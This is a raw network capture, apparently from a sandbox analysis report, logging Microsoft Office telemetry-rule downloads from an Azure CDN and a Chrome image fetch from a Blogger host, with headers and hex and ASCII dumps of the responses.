                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          11192.168.2.74973013.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 2160
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: b913ea27-a01e-0002-1718-1c5074000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf8rgvlb86c9c0098000000049g0000000059vb
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          12192.168.2.74973213.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 450
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: d08e5818-a01e-003d-3417-1c98d7000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cfcrfgzd01a8emnyg00000003pg000000006s2u
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          13192.168.2.74972913.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 3788
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: c1f175ba-101e-0028-7611-1c8f64000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf9c22xp43k2gbqvn00000003ug000000005h14
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          14192.168.2.74973313.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 2980
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 466b9802-701e-000d-0d1f-1c6de3000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cfvtw4hh2496wp8p800000004ng000000004fbk
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          15192.168.2.749726142.250.185.1614432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC914OUTGET /img/b/R29vZ2xl/AVvXsEhV2mufCwic-NGC9wpgCnQ_tNbFA-l8rrqbieFyIxc-hwTYbS3a1TQOLU60Y3imqy1yV2Ra0mLvkxr0mtirFQzRdl8HUIFGwZeHbN-1ZYAFW0XPgAB4Joue2DmmjAJHamVEq0bhi80fVeW8ke7prIDNkNsCHk_8H_jfvg2VB1AGMJndzaxuFOSC_HidiCg3/s1600/motor%20insurance%20quote.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: blogger.googleusercontent.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC482INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                                                                                                          ETag: "v472"
                                                                                                                                                                                                                                                                                                                                                                          Expires: Tue, 15 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="motor insurance quote.jpg"
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 29882
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC908INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 78 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 04 00 12 01 03 00 01 00 00 00 01 00 00 00 31 01 02 00 07 00 00 00 3e 00 00 00 12 02 03 00 02 00 00 00 02 00 02 00 69 87 04 00 01 00 00 00 46 00 00 00 00 00 00 00 47 6f 6f 67 6c 65 00 00 03 00 00 90 07 00 04 00 00 00 30 32 32 30 02 a0 04 00 01 00 00 00 40 01 00 00 03 a0 04 00 01 00 00 00 40 01 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: JFIF``xExifII*1>iFGoogle0220@@CC
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: db ef 5f 59 ff 00 10 bf 23 ed 3f fc 0b fe 01 f3 3f f1 10 33 7e f1 ff 00 c0 4f d2 51 ff 00 05 9f f8 73 ff 00 42 df 8d 3d 3f d5 43 ff 00 c7 68 ff 00 87 cf fc 39 1f f3 2d f8 d3 fe fd 43 ff 00 c7 6b f3 6b 6f bd 1b 7d e9 ff 00 c4 2f c8 fb 4f ff 00 02 ff 00 80 1f f1 10 33 7e f1 ff 00 c0 7f e0 9f a4 bf f0 f9 ff 00 87 24 7f c8 b7 e3 4f 4f f5 50 ff 00 f1 da 5f f8 7d 07 c3 a0 73 ff 00 08 df 8d 3f ef d4 1f fc 76 bf 36 76 fb d1 b7 de 97 fc 42 fc 8f b4 ff 00 f0 2f f8 01 ff 00 11 03 37 ef 1f fc 04 fd 25 1f f0 59 ff 00 87 3f f4 2d f8 d3 d3 fd 54 3f fc 76 8f f8 7c ff 00 c3 91 ff 00 32 df 8d 3f ef d4 3f fc 76 bf 36 b6 fb d1 b7 de 9f fc 42 fc 8f b4 ff 00 f0 2f f8 01 ff 00 11 03 37 ef 1f fc 07 fe 09 fa 4b ff 00 0f 9f f8 72 47 fc 8b 7e 34 f4 ff 00 55 0f ff 00 1d a5 ff 00 87
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: _Y#??3~OQsB=?Ch9-Ckko}/O3~$OOP_}s?v6vB/7%Y?-T?v|2??v6B/7KrG~4U
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: dd 8a 7d fe c0 0e 49 f6 f7 f4 1e b5 f4 d6 99 fb 26 f8 5f e3 26 a3 fd 8b e0 78 7e cb f6 17 81 35 2d 5e 4d 41 e4 d4 34 ac 59 3c f7 10 ea 7a 7d c1 8f c9 95 dc 0f 21 c6 23 c7 cc 5b 0a 6b ea f3 5c ef 0f 97 f2 bc 45 ed 2b eb a5 95 b7 be be 7a 25 76 fa 1f 39 80 cb 6b 63 39 95 1d d5 b4 ef 73 e6 9d d4 9b 87 ad 7b ff 00 85 3f 63 fd 0f c7 de 04 82 eb 47 f1 46 9b 7d 67 75 79 0e aa 35 b8 6f ad 6e 0a 69 72 69 6f 7a 60 78 d2 66 b6 37 08 e1 41 61 2e c2 08 60 76 f2 72 f5 ff 00 d9 6b c2 9e 04 9f 43 97 55 f8 80 b7 36 7e 28 b8 91 b4 63 a4 d9 a5 fc 77 91 46 b1 bb ac c6 09 ca 23 61 8a 93 19 60 b8 dc 4e 2b cc a7 c6 59 64 df 2c 66 db e8 ac ee ff 00 0f f8 3d ec 77 4f 86 f1 b1 f8 92 b7 7b a3 c5 37 0a 5d d5 ec 7e 29 fd 9f 7c 3f a9 fe d6 5e 36 f0 7e 8f 75 aa 58 f8 7f c3 61 ee 03 98
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: }I&_&x~5-^MA4Y<z}!#[k\E+z%v9kc9s{?cGF}guy5onirioz`xf7Aa.`vrkCU6~(cwF#a`N+Yd,f=wO{7]~)|?^6~uXa
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 90 e5 48 20 81 5a 9e 21 fd 91 3e 27 78 5b c5 fa 1f 87 ef bc 17 a9 43 ad f8 92 17 9f 4e b3 59 e0 96 59 55 0e 24 2d e5 c8 c2 30 bc 1c b1 1d 7b 53 be 2c 7e c8 1f 13 be 07 78 65 b5 af 15 f8 42 eb 47 d2 54 61 ae da ee de e2 18 4e 0f fa d6 86 49 04 6b 9c 0d ed c6 48 af 4e 15 b2 39 54 82 84 a9 b9 3b 28 d9 c6 ef 97 65 1f 47 b5 b6 b1 e7 4a 86 66 a9 ce f1 9a 4b 7d 1d b5 de fe a9 99 9a 6f ed 17 e3 bd 23 40 d2 34 cb 5f 14 5e 5b da e8 7b 16 c9 96 da 0f b4 45 1c 4e 5e 18 5e 6f 2f cc 9a 35 24 fc b2 b3 2f 00 e3 20 11 d2 ea 3f b6 bf c4 5b 9b eb 0b fb 1d 73 fb 37 50 b5 b2 b7 b4 b8 9a 2b 1b 79 16 f0 c0 ee d1 cc 62 68 cc 71 c8 3c c6 19 40 38 aa bf 0c 7f 62 ef 8a 7f 1a 3c 31 1e b9 e1 9f 06 ea 17 da 35 c3 95 86 e6 e2 78 2c 7c f0 00 f9 d5 66 75 dc 84 9c 06 04 e7 19 c6 2b d1 3f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: H Z!>'x[CNYYU$-0{S,~xeBGTaNIkHN9T;(eGJfK}o#@4_^[{EN^^o/5$/ ?[s7P+ybhq<@8b<15x,|fu+?
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 66 89 2d ff 00 76 2f 23 44 12 a4 60 2b 4a a0 91 b8 01 c1 e9 54 ff 00 62 24 d7 67 fd ae fe 3b 2f 88 97 53 93 6d cd a7 d8 05 fe e3 fe 8d be 52 9e 5e ee b1 82 38 c7 19 af 83 f4 8f da bb e2 0e 89 f1 9d be 20 27 88 ee 26 f1 74 b1 7d 9d ae a6 81 65 8e 48 7f e7 8e cc 6d db d3 81 cf 15 d8 5b ff 00 c1 48 fe 2e 5b 78 de f3 c4 51 6b 5a 4a ea 97 d6 b1 69 f3 16 d1 e0 d8 62 46 76 8c 05 0d d9 9d b2 49 ce 0f b5 7c 66 3b 81 73 39 c2 70 82 a6 f9 e9 42 2d fc 36 94 5a 6e ca dd 6c 7d 36 17 8a f0 11 9c 65 27 35 cb 52 52 5d 6e a4 9d b5 bf 43 ea 2f f8 26 d7 c7 1d 73 e3 d7 c5 7f 88 93 78 bb 57 6d 57 58 d0 8f d9 34 b5 30 c7 1b 5b 5a b4 8f b8 47 80 0e 4e 06 4f b0 ab 3f 14 7e 33 78 7f c1 9f b3 3f c6 cd 27 52 5f 8c de 2a b2 fe c9 d4 cd ec de 24 d1 9e 78 ac c3 c0 ea 16 27 11 a0 f2 54
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: f-v/#D`+JTb$g;/SmR^8 '&t}eHm[H.[xQkZJibFvI|f;s9pB-6Znl}6e'5RR]nC/&sxWmWX40[ZGNO?~3x?'R_*$x'T
